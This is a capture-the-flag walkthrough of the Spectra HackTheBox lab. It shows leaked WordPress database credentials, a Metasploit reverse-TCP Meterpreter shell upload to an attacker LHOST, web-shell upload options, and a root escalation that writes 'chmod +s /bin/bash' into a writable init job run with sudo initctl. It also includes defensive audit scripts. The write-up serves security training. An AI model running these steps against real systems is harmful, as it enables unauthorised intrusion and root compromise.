Spectra HackTheBox WalkThrough

This is a walkthrough of the Spectra HackTheBox machine. In this writeup I demonstrate step by step how I rooted the Spectra HTB machine. Before starting, let us get to know something about this machine. It is a Linux OS box (which I came to know after rooting) with IP address 10.10.10.229 and a difficulty of easy assigned by its maker.

Also, connect your PC to the HackTheBox VPN and confirm your connectivity with the Spectra machine by pinging its IP, 10.10.10.229. If all goes well, start hacking. As usual, I started by scanning the machine. I used Nmap (a port scanner) for this task and the result is below:

Scanning

$ sudo nmap -sT -sV -p- -O -oA nmap/all-tcp-ports 10.10.10.229

The full TCP scan with Nmap found ports 22, 80 and 3306 open. An OpenSSH server is running on port 22, an Nginx web server on port 80 and a MySQL database server on port 3306. OpenSSH 8.1 is not affected by any serious vulnerability, so I left it for later enumeration, when I would have some credentials. Since a web server is running on port 80, there should be a website hosted on it, and it can be accessed at the URL http://10.10.10.229.

After going to this URL I found a simple HTML web page and some links, namely Software Issue Tracker and Test. Both of these links revealed a virtual host, spectra.htb. So before accessing them, let us add spectra.htb to our hosts file. The hosts file is in the directory /etc/.

Host File After Modification

$ cat /etc/hosts

After going to the URL http://spectra.htb/main/ I found that WordPress is installed in the /main folder with its default theme. Then I pressed CTRL+U to check the source code of this page. After checking the source code I found its version to be 5.4.2.

A quick Google search revealed that this version is not affected by any serious vulnerability that would help us in further enumeration. After going to the URL http://spectra.htb/testing/index.php I found another instance of WordPress installed there, with a database connectivity issue due to which it is not showing the home page. But directory listing is enabled, and you can check all its files through the URL http://spectra.htb/testing.

After some initial enumeration I got the file wp-config.php.save. It contains some credentials. You can only see its content when you view its page source. Here is the URL of the page:

view-source:http://spectra.htb/testing/wp-config.php.save

From the above, the extracted credential is

DB_USER: devtest

DB_PASSWORD: devteam01
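
From the defender's side, the finding above is an editor backup of wp-config.php left inside the web root, where it is served as text instead of being executed by PHP. The following added example (not part of the original walkthrough) lists such backup files and flags those that still hold a DB_PASSWORD definition; the function names and the sample tree are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): find backup copies of PHP files
# that a web server would serve as plain text, e.g. wp-config.php.save.

# List files under a web root whose names match common editor/backup suffixes.
find_exposed_backups() {
    find "$1" -type f \( \
        -name '*.php.save' -o -name '*.php.bak' -o -name '*.php.orig' \
        -o -name '*.php.old' -o -name '*.php~' -o -name '.*.php.swp' \
    \) -print | sort
}

# Of those, report the ones that still define a WordPress database password.
find_leaked_db_secrets() {
    local f
    find_exposed_backups "$1" | while IFS= read -r f; do
        if grep -Eq "define\([[:space:]]*['\"]DB_PASSWORD['\"]" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Constructed sample tree mirroring the /main and /testing layout on the page.
make_constructed_webroot() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/main" "$root/testing"
    printf "<?php\ndefine( 'DB_PASSWORD', 'constructed-secret' );\n" \
        > "$root/testing/wp-config.php.save"   # served as text: leaks
    printf "<?php\ndefine( 'DB_PASSWORD', 'constructed-secret' );\n" \
        > "$root/main/wp-config.php"           # executed by PHP: not listed
    printf "<?php echo 'hello';\n" > "$root/main/index.php.bak"  # backup, no secret
    printf '%s\n' "$root"
}

# Demo on the constructed tree; point the functions at a real web root instead.
sample=$(make_constructed_webroot)
find_leaked_db_secrets "$sample"
rm -rf "$sample"
```

Any path it prints should be removed from the web root and the password it contains rotated, since the same password may be reused on other accounts, as it was here.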

When I tried to log in at http://spectra.htb/main/wp-login.php with the creds devtest: devteam01, it said wrong credential. But when I tried the credential administrator: devteam01, it logged in successfully. I think this is the reason that the database connectivity issue is present at http://spectra.htb/testing/. devtest should be replaced with administrator in the above config file for proper connectivity. Anyway, let us get a user shell using these creds.

There are multiple ways to get a user shell once you have WordPress login credentials. The ways are

1. Upload Shell through Add Theme option.

2. Upload Shell through Add Plugins option.

3. Shell upload into 404.php file of theme.

4. Using pre-installed Plugins into header.php

5. Use metasploit module exploit/unix/webapp/wp_admin_shell_upload to upload and get shell.

I am going to use the 5th way, that is, using Metasploit. To get a user shell, follow the given steps.

Getting User Shell

msf6 > search wp_admin

msf6 > use exploit/unix/webapp/wp_admin_shell_upload

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.htb

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.57

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/

msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > sysinfo

meterpreter > getuid

We have successfully got a user shell with the privileges of user nginx. Let us upgrade it to a fully qualified Linux shell so that we can run more advanced Linux commands through it.

Upgrading Shell

meterpreter > shell

~export PATH

~export TERM=xterm

~python3 -c 'import pty;pty.spawn("/bin/bash")'

We have successfully upgraded the shell. When I tried to capture the user flag from /home/katie/ it gave me an access denied error because user nginx doesn’t have permission to access the user.txt file. We have to find the credential of user katie, with which we can upgrade this shell to a shell with katie’s privileges.

After some enumeration I found the file autologin.conf.orig in the /opt/ directory. This file contains the path of the passwd file, which contains the actual credential. The complete path is /etc/autologin/passwd.

$ cat /opt/autologin.conf.orig

$ cat /etc/autologin/passwd

The passwd file has a credential. When I tried to use it as the katie SSH cred, it worked. So we have the SSH credential of user katie.

katie: SummerHereWeCome!!

Let us log in to katie’s account and capture the user flag.

Login Into Katie’s Account

$ ssh [email protected]

~SummerHereWeCome!!

$ whoami && id

We have successfully logged in as katie. Let us capture the user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate privilege to root we first have to find a privilege escalation vector.

Finding PrivEsc Vector

The sudo -l command revealed that user katie can run the initctl command with root user privilege.

This can be our potential PrivEsc vector. When I tried to get a root shell by exploiting this excess right given to user katie, I could get a root shell easily. So here our potential privilege escalation vector is getting root by sudo right exploitation.

Let us understand how it works. initctl is the tool used to start and stop init daemon jobs (services); in other words, it controls all the init jobs running on the system. All init job configuration files are in the directory /etc/init/. If we can somehow change any of these configuration files, then we can start its job with the initctl command, which executes the script in that config file. Since the initctl command is run with root privilege through sudo, the code inside this configuration file is also executed as root, and we get a root shell.

So to get a root shell I modified an init daemon configuration file, test.conf, inside the directory /etc/init/, since other users can read and write this file. I replaced the content between script and end script with my shell code.

script
    chmod +s /bin/bash
end script

After making the changes, save the file and start the daemon using the sudo command, following the steps given below. Do this as quickly as possible, because the content of the modified file will be replaced with the previous file content. If all goes well you will upgrade your shell to a root shell.

Getting Root Shell

$ sudo -l

$ ls -la /etc/init | grep test

$ vi /etc/init/test.conf

$ cat /etc/init/test.conf

$ sudo /sbin/initctl start test

$ /bin/bash -p

# whoami && id

We are root now. Let us capture the root flag.

Capture Root Flag

# cat /root/root.txt
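
The root cause of this escalation is a job file under /etc/init/ that a non-root user can write, combined with sudo rights on initctl. The following added example (not part of the original walkthrough) audits a job directory for such files; the function names and the sample directory are constructed, and it assumes GNU find and stat.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): audit init job files.

# Print "<mode> <owner>:<group> <path>" for every *.conf in the job directory
# that is group- or world-writable, or not owned by the expected owner.
# $1 = job directory (default /etc/init), $2 = expected owner (default root).
audit_init_jobs() {
    local dir="${1:-/etc/init}" owner="${2:-root}"
    find "$dir" -maxdepth 1 -type f -name '*.conf' \
        \( -perm -020 -o -perm -002 -o ! -user "$owner" \) \
        -exec stat -c '%a %U:%G %n' {} + | sort -k3
}

# Constructed sample directory: one safe job, one group-writable job that
# stands in for the writable test.conf, and one non-job file that is ignored.
make_constructed_jobs() {
    local d
    d=$(mktemp -d)
    printf 'script\n    echo ok\nend script\n' > "$d/safe.conf"
    printf 'script\n    echo ok\nend script\n' > "$d/test.conf"
    printf 'not a job\n' > "$d/notes.txt"
    chmod 644 "$d/safe.conf"
    chmod 664 "$d/test.conf"
    chmod 666 "$d/notes.txt"
    printf '%s\n' "$d"
}

# Demo: the sample files belong to the current user, so pass that uid as the
# expected owner. On a real host run: audit_init_jobs /etc/init root
jobs_dir=$(make_constructed_jobs)
audit_init_jobs "$jobs_dir" "$(id -u)"
rm -rf "$jobs_dir"
```

On a host where any non-root account may run initctl through sudo, every line this prints is a file that account can use to run commands as root; the fix is root ownership with mode 644 and a sudoers entry limited to the specific jobs that are needed.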

This was how I rooted the Spectra HackTheBox machine. I learnt a lot from this challenge, and I hope you have also learnt some new things. Thanks for reading this walkthrough. For any query or suggestion related to the walkthrough, feel free to write to us at [email protected].

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/